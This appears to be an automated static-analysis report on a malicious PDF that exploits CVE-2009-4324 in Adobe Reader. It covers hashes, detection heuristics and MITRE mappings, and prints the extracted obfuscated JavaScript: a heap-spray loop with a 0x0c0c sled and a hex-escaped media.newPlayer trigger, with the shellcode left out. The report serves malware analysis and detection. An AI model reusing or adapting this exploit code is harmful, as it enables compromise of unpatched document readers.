Malicious PDF — malware analysis report

Static analysis result for SHA-256 439ac90a06153295…

Verdict: MALICIOUS
File type: PDF
Size: 1.17 MB
Created: 2009-12-17 03:14:38 +08:00
Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows))
First seen: 2012-09-15
MD5: 05a9b5b9cb10f99dd1ed0f3b37abfba3
SHA-1: 9b29087ed4f1e8790b90e9f3d2d55752af822db6
SHA-256: 439ac90a0615329570b81dfe72e51067dc98cdebd447c3dc85463b39c0db35e6
Risk Score: 220

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier and contains embedded JavaScript. The JavaScript stream, named 'javascript_obj0031_000.js', is likely responsible for the malicious behavior. While the specific actions of the script are not fully detailed, its presence within a high-confidence malicious PDF suggests it is designed to download and execute a second-stage payload or perform other harmful actions.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9984

Heuristics (9)

  • media.newPlayer — CVE-2009-4324 [critical; CVE exact; rule CVE_2009_4324]
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
  • JavaScript action [low; 2 related findings; rule PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit [critical; CVE related; rule PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY]
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream [low; rule PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage [high; rule PDF_GENERIC_STAGE_RECOVERY]
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Embedded file [low; rule PDF_EMBEDDED]
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload.
  • Object number defined twice with different bodies [info; rule PDF_DUPLICATE_OBJ_BODY_INCREMENTAL]
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact [info; rule EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info; rule EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
      • http://ns.adobe.com/pdf/1.3/ (in PDF document text)
      • http://ns.adobe.com/xap/1.0/ (in PDF document text)
      • http://purl.org/dc/elements/1.1/ (in PDF document text)
      • http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
    All five are standard XMP/RDF metadata namespace identifiers, which is consistent with their "in PDF document text" channel label rather than with a URL reached by the JavaScript.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: k1
  Kind: pdf-embedded-file
  Source: PDF EmbeddedFile object 26 at offset 0x1EC1
  Size: 2041 bytes
  SHA-256: d126f2ad4fc1902116e64aff7689cafa64a8efc447f950c255d916aa5935137f

Filename: javascript_obj0031_000.js
  Kind: pdf-javascript-stream
  Source: PDF /JS object 31 at offset 0x12B202
  Size: 3701 bytes
  SHA-256: e9cb2449c93332aca5f571fb90f55fc92f7cf919152b2372665d6cd3a0c65799
Preview script
First 1,000 lines of the extracted script
var WeasdRTgfdTYhgfYujhgUIIjjh=unescape;
var UJNyhbTGVrfc = WeasdRTgfdTYhgfYujhgUIIjjh(/* %u-encoded shellcode string (38 lines of escaped bytes) omitted from this preview */);
var yiojnhttewqwsxfguUJHTredDEEdfgGREWswqwASDGhHNJIIOoytFGV="QAAzweeRDFCfttyyHVBVJHjiKJJhgfFFvbhjJKIUytrfFGfdfg";
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = WeasdRTgfdTYhgfYujhgUIIjjh("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = WeasdRTgfdTYhgfYujhgUIIjjh("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 32768) QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,32768 - UJNyhbTGVrfc.length);
var EDVGYujmkoQAZxdr=Array;
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
for(i=0;i<0x2000;i++) {
	memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + UJNyhbTGVrfc;
}

util.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new Date());
util.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new Date());
try {this.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {}  // hex-escaped property name decodes to "newPlayer" (the CVE-2009-4324 trigger); the escapes defeat a plain-text match on media.newPlayer
util.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY, new Date());
Filename: generic_stage_recovery_000.js
  Kind: deobfuscated-js
  Source: generic stage recovery (split-literal-normalize) from JavaScript object 31 at offset 0x12B202
  Size: 3461 bytes
  SHA-256: dd81a6025f7788235f0ba96e734e15fa835b519be9bf117ccab816643f368b42
Detection
ClamAV: No threats found
Obfuscation or payload: likely
12 of 18 identifiers look randomly generated (e.g. 'QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkm') — consistent with name-mangling obfuscation.
This artifact is the javascript_obj0031_000.js script above with the split "\x25\x75" escapes inside the shellcode string normalized to plain "%u" escapes and the string concatenations merged; the remaining lines are identical.